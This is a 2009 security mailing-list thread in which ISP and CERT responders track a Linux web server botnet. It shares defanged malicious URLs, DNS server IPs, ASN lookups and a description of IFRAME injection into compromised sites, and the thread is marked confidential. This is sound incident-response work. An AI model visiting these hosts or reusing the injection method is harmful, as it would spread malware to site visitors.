[nsp-sec] Linux webserver botnet

Shelton, Steve sshelton at Cogentco.com
Tue Sep 15 11:27:41 EDT 2009 

Thomas,

Thanks for the info, currently see the following and series of DNS
servers facilitating both domains.

> hxxp://red-wolf.ru:8080/ts/in.cgi?open	>
hxxp://doxyia.ru:8080/index.php

--- 09/15/09 09:17:48 Mountain Daylight Time

ns1.red-wolf.ru [216.24.153.206]
ns2.red-wolf.ru [74.55.116.90]
ns3.red-wolf.ru [64.235.54.100]
ns4.red-wolf.ru [66.232.147.85]

ns1.doxyia.ru [216.24.153.206]
ns2.doxyia.ru [74.55.116.90]
ns3.doxyia.ru [64.235.54.100]
ns4.doxyia.ru [66.232.147.85]

Bulk mode; whois.cymru.com [2009-09-15 14:40:13 +0000]

9848    | 66.232.147.85    | GNGAS Enterprise Networks
13649   | 216.24.153.206   | ASN-VINS - ViaWest
21844   | 74.55.116.90     | THEPLANET-AS - ThePlanet.com Internet
Services, Inc.
26277   | 64.235.54.100    | PREMIANET - A+Hosting, Inc.

Bulk mode; peer-whois.cymru.com [2009-09-15 14:40:15 +0000]

174     | 216.24.153.206   | COGENT Cogent/PSI
174     | 64.235.54.100    | COGENT Cogent/PSI
701     | 66.232.147.85    | UUNET - MCI Communications Services, Inc.
d/b/a Verizon Business
2828    | 64.235.54.100    | XO-AS15 - XO Communications
2914    | 66.232.147.85    | NTT-COMMUNICATIONS-2914 - NTT America, Inc.
2914    | 74.55.116.90     | NTT-COMMUNICATIONS-2914 - NTT America, Inc.
3356    | 216.24.153.206   | LEVEL3 Level 3 Communications
3356    | 74.55.116.90     | LEVEL3 Level 3 Communications
3491    | 66.232.147.85    | BTN-ASN - Beyond The Network America, Inc.
3549    | 74.55.116.90     | GBLX Global Crossing Ltd.
3561    | 74.55.116.90     | SAVVIS - Savvis
4565    | 74.55.116.90     | MEGAPATH2-US - MegaPath Networks Inc.
6461    | 74.55.116.90     | MFNX MFN - Metromedia Fiber Network
7385    | 64.235.54.100    | INTEGRATELECOM - Integra Telecom, Inc.
9318    | 66.232.147.85    | HANARO-AS Hanaro Telecom Inc.
10026   | 66.232.147.85    | ANC Asia Netcom Corporation
10310   | 74.55.116.90     | YAHOO-1 - Yahoo!
15412   | 66.232.147.85    | FLAG-AS Flag Telecom Global Internet AS
32184   | 216.24.153.206   | RMIX-ASN - Comfluent

I'm currently working on killing off at least two of the DNS servers.

Steve Shelton
Security Engineer
Cogent Communications





-----Original Message-----
From: nsp-security-bounces at puck.nether.net
[mailto:nsp-security-bounces at puck.nether.net] On Behalf Of Thomas
Hungenberg
Sent: Tuesday, September 15, 2009 8:37 AM
To: NSP-SEC List
Subject: Re: [nsp-sec] Linux webserver botnet

----------- nsp-security Confidential --------


Several compromised websites that had an IFRAME pointing to dyndns hosts
(like <hXXp://a2stu.blogdns.com:8080/ts/in.cgi?open>) injected last week
now have an IFRAME pointing to <hXXp://red-wolf.ru:8080/index.php>.

It appears the attackers are updating the injected IFRAMEs.

Currently I do not get any content from the new URL.

16265   | 85.17.237.5      | NL | red-wolf.ru     | LEASEWEB LEASEWEB AS
16276   | 91.121.121.6     | FR | red-wolf.ru     | OVH OVH
16276   | 91.121.134.229   | FR | red-wolf.ru     | OVH OVH
16276   | 91.121.74.84     | FR | red-wolf.ru     | OVH OVH
20857   | 80.69.74.73      | NL | red-wolf.ru     | TRANSIP-AS TransIP
BV


     - Thomas

CERT-Bund Incident Response & Anti-Malware Team

Thomas Hungenberg schrieb:
> ----------- nsp-security Confidential --------
> 
> 
> 
>
------------------------------------------------------------------------
> 
> Regarding the article on The Register:
> 
> I was working with Roman from abuse.ch on this last week and
> he blogged about it on Friday: <http://www.abuse.ch/?p=1801>
> 
> We've seen 1500+ unique dyndns hostnames used with IFRAMEs injected
> into compromised websites so far.
> 
> Please find attached a list of dyndns hostnames we have seen that are
> currently resolving (837 hostnames resolving to 105 unique IPs).
> Format: ASN | IP | CC | hostname | AS name
> 
> All these IPs most likely are compromised servers that are/were
running
> an nginx proxy on port 8080 (it appears some servers have already been
> cleaned up).
> 
> 
>      - Thomas
> 
> CERT-Bund Incident Response & Anti-Malware Team
> 
> 
> SURFcert - Peter schrieb:
>> ----------- nsp-security Confidential --------
>>
>> Hi,
>>
>> Coincidence or not? Just today I read
>> http://www.theregister.co.uk/2009/09/12/linux_zombies_push_malware/
and
>> at the same time I got a report about a linux web server that was
>> infected and part of a botnet. I have ordered to not re-install that
>> specific server but try to get the services running on another one.
>>
>> The got into the system through an old vulnerable phpMyAdmin version.
>> The strange thing is there shouldn't be any phpMyadmin on that box.
We
>> will sort that out later. We can probably pull the source of the
botnet
>> malware from the logging (at first sight it appears to be a host in
>> Germany). And we probably will get some information about the IRC
>> channel and passwords used to access 82.197.159.61 on port 9999.
>>
>> I hope to be able to get as much as possible out of that host before
I
>> am off on holiday and without e-mail for about two weeks. Important
>> stuff will of course be shared as much as possible.
>>
> 
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
> 
> Please do not Forward, CC, or BCC this E-mail outside of the
nsp-security
> community. Confidentiality is essential for effective Internet
security counter-measures.
> _______________________________________________
> 
> 
> 
>
------------------------------------------------------------------------
> 
> 
> 
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
> 
> Please do not Forward, CC, or BCC this E-mail outside of the
nsp-security
> community. Confidentiality is essential for effective Internet
security counter-measures.
> _______________________________________________




_______________________________________________
nsp-security mailing list
nsp-security at puck.nether.net
https://puck.nether.net/mailman/listinfo/nsp-security

Please do not Forward, CC, or BCC this E-mail outside of the
nsp-security
community. Confidentiality is essential for effective Internet security
counter-measures.
_______________________________________________

More information about the nsp-security mailing list